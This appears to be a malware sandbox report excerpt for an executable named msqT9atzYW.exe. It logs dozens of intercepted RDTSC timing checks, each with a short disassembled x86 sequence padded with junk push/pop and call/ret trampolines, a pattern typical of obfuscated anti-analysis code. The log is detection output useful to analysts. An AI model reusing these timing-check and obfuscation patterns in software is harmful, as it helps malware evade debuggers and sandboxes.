Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E1DAAC second address: E1DAFC instructions: 0x00000000 rdtsc 0x00000002 ja 00007F43C9098CF2h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b sub dword ptr [ebp+122D2873h], edx 0x00000011 push 00000000h 0x00000013 mov esi, dword ptr [ebp+122D2A85h] 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push ebp 0x0000001e call 00007F43C9098CE8h 0x00000023 pop ebp 0x00000024 mov dword ptr [esp+04h], ebp 0x00000028 add dword ptr [esp+04h], 0000001Ch 0x00000030 inc ebp 0x00000031 push ebp 0x00000032 ret 0x00000033 pop ebp 0x00000034 ret 0x00000035 push eax 0x00000036 push ecx 0x00000037 push edi 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E2094D second address: E2096E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE0083h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jo 00007F43C8AE007Eh 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E21DB2 second address: E21DB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E21DB6 second address: E21DC0 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F43C8AE0076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: DCE4CE second address: DCE4D3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E283D4 second address: E283F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F43C8AE0087h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E283F4 second address: E283F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E283F8 second address: E2845B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 nop 0x00000008 mov edi, ebx 0x0000000a push 00000000h 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007F43C8AE0078h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 00000015h 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 jnp 00007F43C8AE007Ah 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push ecx 0x00000031 call 00007F43C8AE0078h 0x00000036 pop ecx 0x00000037 mov dword ptr [esp+04h], ecx 0x0000003b add dword ptr [esp+04h], 00000015h 0x00000043 inc ecx 0x00000044 push ecx 0x00000045 ret 0x00000046 pop ecx 0x00000047 ret 0x00000048 mov dword ptr [ebp+122D35DEh], eax 0x0000004e xor dword ptr [ebp+124A1BD8h], eax 0x00000054 push eax 0x00000055 pushad 0x00000056 pushad 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E2845B second address: E28466 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E28466 second address: E2846A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E29421 second address: E29427 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E29427 second address: E2942B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E2A58A second address: E2A59E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CF0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E2A59E second address: E2A5BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43C8AE0089h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E2A5BB second address: E2A5BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E2B69F second address: E2B6A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E2B6A3 second address: E2B6A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E21F64 second address: E21F68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E21F68 second address: E21F83 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CF7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E22051 second address: E22055 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E22055 second address: E2205B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E2C760 second address: E2C764 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E2964B second address: E2964F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E2E72B second address: E2E732 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E315B5 second address: E315D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CF4h 0x00000007 je 00007F43C9098CE6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E31B67 second address: E31B6E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E31B6E second address: E31BB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F43C9098CE8h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 sub dword ptr [ebp+122D1B58h], esi 0x0000002a push 00000000h 0x0000002c mov bl, 87h 0x0000002e push 00000000h 0x00000030 mov edi, dword ptr [ebp+122D2A69h] 0x00000036 xchg eax, esi 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a push ebx 0x0000003b pop ebx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E31BB1 second address: E31BB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E32BF7 second address: E32BFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E32BFB second address: E32C0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F43C8AE007Ah 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E31DB1 second address: E31DC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 jo 00007F43C9098CF0h 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E2A87F second address: E2A892 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43C8AE007Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E37B38 second address: E37B42 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F43C9098CE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E3BDB5 second address: E3BDBB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E3BDBB second address: E3BDC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E3BDC5 second address: E3BDCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F43C8AE0076h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E3BDCF second address: E3BDD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E3B653 second address: E3B657 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E3B657 second address: E3B662 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E3B7B4 second address: E3B7C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE0080h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E3B917 second address: E3B921 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F43C9098CE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E3B921 second address: E3B952 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F43C8AE007Ah 0x00000008 je 00007F43C8AE007Ch 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pushad 0x00000014 popad 0x00000015 pop esi 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a jmp 00007F43C8AE007Dh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E3B952 second address: E3B956 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E3B956 second address: E3B96B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F43C8AE007Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E3B96B second address: E3B971 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E40B04 second address: E40B0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E40BD5 second address: E40BD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E40D0A second address: E40D55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edi 0x00000008 push eax 0x00000009 pushad 0x0000000a popad 0x0000000b pop eax 0x0000000c pop edi 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 jbe 00007F43C8AE0089h 0x00000017 jmp 00007F43C8AE0083h 0x0000001c mov eax, dword ptr [eax] 0x0000001e jp 00007F43C8AE00A7h 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F43C8AE0087h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E459DC second address: E459E6 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F43C9098CE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E459E6 second address: E459F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pushad 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E459F1 second address: E45A0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F43C9098CEBh 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E45B80 second address: E45B8F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE007Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E45B8F second address: E45B9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jng 00007F43C9098CE6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E45B9F second address: E45BA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E45CDF second address: E45CFC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CF9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E46135 second address: E46144 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007F43C8AE0076h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E46144 second address: E46148 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E462C1 second address: E462D9 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F43C8AE0076h 0x00000008 js 00007F43C8AE0076h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jl 00007F43C8AE0082h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E4659F second address: E465A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: DC28C0 second address: DC28D1 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F43C8AE007Ch 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: DC28D1 second address: DC28E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jl 00007F43C9098CE6h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 jno 00007F43C9098CE6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: DC28E9 second address: DC28ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: DC28ED second address: DC2903 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jng 00007F43C9098CF2h 0x0000000e jp 00007F43C9098CE6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E5311B second address: E53135 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F43C8AE007Dh 0x00000009 pop ebx 0x0000000a push ecx 0x0000000b jns 00007F43C8AE0076h 0x00000011 pop ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E532B7 second address: E532BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E532BB second address: E532D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F43C8AE0087h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E8F27A second address: E8F27F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E8F27F second address: E8F285 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E8F565 second address: E8F571 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jo 00007F43C9098CE6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E8F571 second address: E8F58C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE0087h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E8F58C second address: E8F595 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E9700B second address: E97011 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E97011 second address: E97017 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E97017 second address: E97021 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F43C8AE0076h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E97021 second address: E9702E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E96A97 second address: E96A9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E96A9B second address: E96AA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E96AA6 second address: E96AAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop ecx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E96AAD second address: E96AB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E96AB5 second address: E96AB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E96D2B second address: E96D31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E96D31 second address: E96D39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E96D39 second address: E96D51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F43C9098CECh 0x00000009 je 00007F43C9098CE6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E96D51 second address: E96D56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: EA6A03 second address: EA6A10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: EA6A10 second address: EA6A4D instructions: 0x00000000 rdtsc 0x00000002 jng 00007F43C8AE0076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F43C8AE0087h 0x0000000f jmp 00007F43C8AE0081h 0x00000014 popad 0x00000015 je 00007F43C8AE00B0h 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: EA6A4D second address: EA6A56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: EA65C2 second address: EA65C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: EABDC3 second address: EABDD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jne 00007F43C9098CE6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: EABDD4 second address: EABDDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F43C8AE0076h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: EABDDF second address: EABE1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 jp 00007F43C9098CE6h 0x0000000b pop eax 0x0000000c jc 00007F43C9098CEAh 0x00000012 push edx 0x00000013 pop edx 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 pushad 0x0000001a jng 00007F43C9098CE6h 0x00000020 jmp 00007F43C9098CF0h 0x00000025 popad 0x00000026 pushad 0x00000027 jmp 00007F43C9098CEAh 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: EC3BD9 second address: EC3BF7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 jmp 00007F43C8AE0081h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: EC3BF7 second address: EC3BFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
